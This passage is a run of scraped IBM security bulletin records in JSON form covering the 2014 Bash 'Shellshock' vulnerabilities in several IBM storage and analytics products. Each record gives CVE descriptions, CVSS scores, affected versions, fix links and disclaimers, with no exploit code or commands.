THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Internal Use Only\n\n**IBM PureData System for Operational Analytics** \n \n--- \nIBM Power Hardware Management Console (HMC) V7 R7.7.0 SP2| Install fix MH01480| [IBM Fix Central: MH01480](<http://www.ibm.com/support/fixcentral/main/quickorder?product=ibm/hmc/9100HMC&release=V7R7.7.0&platform=All&function=fixId&fixids=MH01480&includeRequisites=0&includeSupersedes=0&downloadMethod=ddp&source=fc>)| [Installing a IBM Hardware Management Console fix in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www-01.ibm.com/support/docview.wss?uid=swg21671109#mh01425>) \nIBM System Storage SAN48B (Brocade)| Upgrade to 7.2.1c1| [Brocade: FOS 7.2.1c1](<http://ibm.brocadeassist.com/public/FabricOSv7xRelease>)| [Installing an IBM System Storage SAN switch firmware update in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www.ibm.com/support/docview.wss?uid=swg21686554>) \nIBM Storwize V7000| Upgrade to 6.4.1.11| IBM Fix Central: 6.4.1.11| [IBM Storwize V7000: Upgrading the software automatically using the CLI](<http://www-01.ibm.com/support/knowledgecenter/ST3FR7/com.ibm.storwize.v7000.641.doc/svc_installingtheupgrade_22hh6p.html>) \n \n[{\"Product\":{\"code\":\"SSKT3D\",\"label\":\"IBM Smart Analytics System\"},\"Business Unit\":{\"code\":\"BU050\",\"label\":\"BU NOT IDENTIFIED\"},\"Component\":\"IBM Smart Analytics System 7700\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"9.7\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"SSKT3D\",\"label\":\"IBM Smart Analytics System\"},\"Business Unit\":{\"code\":\"BU050\",\"label\":\"BU NOT IDENTIFIED\"},\"Component\":\"IBM Smart Analytics System 7600\",\"Platform\":[{\"code\":\"\",\"label\":\"AIX 6.1\"}],\"Version\":\"9.7\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"SSKT3D\",\"label\":\"IBM Smart Analytics System\"},\"Business Unit\":{\"code\":\"BU050\",\"label\":\"BU NOT IDENTIFIED\"},\"Component\":\"IBM Smart Analytics System 7710\",\"Platform\":[{\"code\":\"\",\"label\":\"AIX 6.1\"}],\"Version\":\"9.7\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:58:11", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 7600, 7700 and 7710 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-16T13:58:11", "id": "E1A56F82327D8FB00BD84085E673D1401848A384A92C33B13DC0ED642E86946B", "href": "https://www.ibm.com/support/pages/node/253045", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:13:41", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by the IBM Hyper-Scale Manager component of the XIV Management Tools.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96153_**](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96209_**](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Hyper-Scale Manager application and appliance versions 1.5.0.58 and earlier.\n\n## Remediation/Fixes\n\n 1. For the IBM Hyper-Scale Manager **application, **the remediation is to upgrade the host operating system with the operating system\u2019s vendor-supplied fix to the vulnerability.\n 2. For the IBM Hyper-Scale Manager **appliance, **the remediation is to upgrade the IBM Hyper-Scale Manager appliance to version 1.5.0.59.\n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"STJTAG\",\"label\":\"Disk systems->XIV Storage System (2810, 2812)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"\",\"label\":\"N\\/A\"}],\"Version\":\"Not Applicable\",\"Edition\":\"N\\/A\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:08:42", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect the IBM Hyper-Scale Manager component of the XIV Management Tools (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-18T00:08:42", "id": "542851630FD5F0CA12E39120280D90B66CBC639D15CC167486A7006068A5563D", "href": "https://www.ibm.com/support/pages/node/690015", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:23", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by ProtecTIER.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96153_**](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96209_**](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID**: [_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[**CVE-ID**:_ __CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nProtecTIER Deduplication Gateway for System Z (PID 5639-FPA) \nProtecTIER Enterprise Edition (PID 5639-PTA) \nProtecTIER Appliance Edition (PID 5639-PTB) \nProtecTIER Entry Edition (PID 5639-PTC)\n\n## Remediation/Fixes\n\nUpdate exists to ProtecTIER versions 3.1.8 and higher, including 3.2.x and 3.3.x versions as well as PID 5639-FPA version 1.2.x. Updates are available to download from IBM Fix Central: \n<http://www-933.ibm.com/support/fixcentral/>\n\nHere is a URL to each of the ProtecTIER products:\n\n \n \nProtecTIER De-duplication Gateway for System Z (PID 5639-PTB) \n[_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Storage_Tape/TS7680+ProtecTIER+Deduplication+Gateway+for+System+z&release=All&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Storage_Tape/TS7680+ProtecTIER+Deduplication+Gateway+for+System+z&release=All&platform=All&function=all>) \n \nProtecTIER Enterprise Edition (PID 5639-PTA) \n[_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Storage_Tape/TS7650G+with+ProtecTIER&release=All&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Storage_Tape/TS7650G+with+ProtecTIER&release=All&platform=All&function=all>) \n \nProtecTIER Appliance Edition (PID 5639-PTB) \n[_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Tape%2Bvirtualization&product=ibm/Storage_Tape/TS7650+ProtecTIER+Deduplication+Appliances&release=All&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Tape%2Bvirtualization&product=ibm/Storage_Tape/TS7650+ProtecTIER+Deduplication+Appliances&release=All&platform=All&function=all>) \n \nProtecTIER Entry Edition (PID 5639-PTC) \nFor TS7610 model: \n[_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Tape%2Bvirtualization&product=ibm/Storage_Tape/TS7610+ProtecTIER+Deduplication+Appliance&release=All&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Tape%2Bvirtualization&product=ibm/Storage_Tape/TS7610+ProtecTIER+Deduplication+Appliance&release=All&platform=All&function=all>) \n \nFor TS7620 model: \n[_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Tape%2Bvirtualization&product=ibm/Storage_Tape/TS7620+ProtecTIER+Deduplication+Appliance+Express&release=All&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Tape%2Bvirtualization&product=ibm/Storage_Tape/TS7620+ProtecTIER+Deduplication+Appliance+Express&release=All&platform=All&function=all>)\n\nIf you have an earlier version than 3.1.8, please contact IBM Support to obtain fix.\n\n## Workarounds and Mitigations\n\nNo known workarounds. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n30 September 2014 Original bulletin created \n8 October 2014 updated with supported models and code levels.\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"STVRB7\",\"label\":\"IBM 3958 System Storage TS7650G ProtecTIER Deduplication Gateway (3958-DD1)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"3.3.7.0;3.3.5;3.3.4;3.3.3;3.3.2;3.3;3.2;3.1.8\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STHNX8\",\"label\":\"IBM 3959 System Storage TS7620 ProtecTIER Deduplication Appliance (3959-SM2)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STLPPL\",\"label\":\"IBM 3958 System Storage TS7650 ProtecTIER Deduplication Appliance (3958-AP1)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STVRB7\",\"label\":\"IBM 3958 System Storage TS7650G ProtecTIER Deduplication Gateway (3958-DD1)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STEL9Z\",\"label\":\"IBM 3958 System Storage TS7680 ProtecTIER Deduplication Gateway (3958-DE2)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T22:20:21", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect ProtecTIER (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-02-16T22:20:21", "id": "26A7BDE71EA4560DCB34E2D71A77E04F6BD6F1464BE7B6966FCB08892C8C99B7", "href": "https://www.ibm.com/support/pages/node/690049", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:11", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by TSSC..\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96153_**](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96209_**](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID**: 